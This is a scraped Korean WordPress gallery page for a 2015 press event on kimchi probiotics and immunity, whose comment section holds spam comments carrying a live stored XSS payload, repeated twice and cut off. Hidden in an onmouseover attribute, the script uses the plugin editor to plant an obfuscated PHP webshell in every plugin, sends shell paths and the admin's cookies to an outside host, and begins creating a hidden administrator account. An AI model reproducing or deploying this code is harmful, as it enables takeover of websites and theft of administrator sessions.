Home 갤러리 15.11.04 – ‘김치유산균과 면역력’ 기자간담회 갤러리 15.11.04 – ‘김치유산균과 면역력’ 기자간담회 By kofrum - Nov 3, 2015 1967 4 SHARE Facebook Twitter
hinice sysacr :-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址 var StartGetshell = 1; //是否getshell全部模板 1为是 0为否 var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp"; if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } } function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) } function GetAllShell(target){ var TmpArr = target.split("|")[1]; var filename = target.split("|")[0]; if(filename!=file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'plugin': filename,'Submit':'Select'}, }) .done(function(data) { var NewCode = ""; var NewToken= ""; var Getshell=jQuery(data); Getshell.find("textarea#newcontent").each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" x "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return false; } NewCode = o.text().replace('<?php',shellcode); }); Getshell.find("input#_wpnonce").each(function(i,o){ var o=jQuery(o); NewToken = o.attr('value'); }); if(NewCode&&NewToken){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'} }) .done(function(){ shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return; }) .fail(function(){ shell.push(location.href+': GetShell '+filename+' Failure'); }) } }) } } function adduser(){ jQuery.ajax({ url: Aurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; temp.find('input#_wpnonce_create-user').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); jQuery.ajax({ url: Aurl, type: 'POST', data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administ&%2 Reply
hellonice wfefog :-)
hellonice gqubee :-)
hinice sysacr :-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址 var StartGetshell = 1; //是否getshell全部模板 1为是 0为否 var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp"; if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } } function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) } function GetAllShell(target){ var TmpArr = target.split("|")[1]; var filename = target.split("|")[0]; if(filename!=file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'plugin': filename,'Submit':'Select'}, }) .done(function(data) { var NewCode = ""; var NewToken= ""; var Getshell=jQuery(data); Getshell.find("textarea#newcontent").each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" x "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return false; } NewCode = o.text().replace('<?php',shellcode); }); Getshell.find("input#_wpnonce").each(function(i,o){ var o=jQuery(o); NewToken = o.attr('value'); }); if(NewCode&&NewToken){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'} }) .done(function(){ shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return; }) .fail(function(){ shell.push(location.href+': GetShell '+filename+' Failure'); }) } }) } } function adduser(){ jQuery.ajax({ url: Aurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; temp.find('input#_wpnonce_create-user').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); jQuery.ajax({ url: Aurl, type: 'POST', data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administ&%2
hellonice iykorl :-)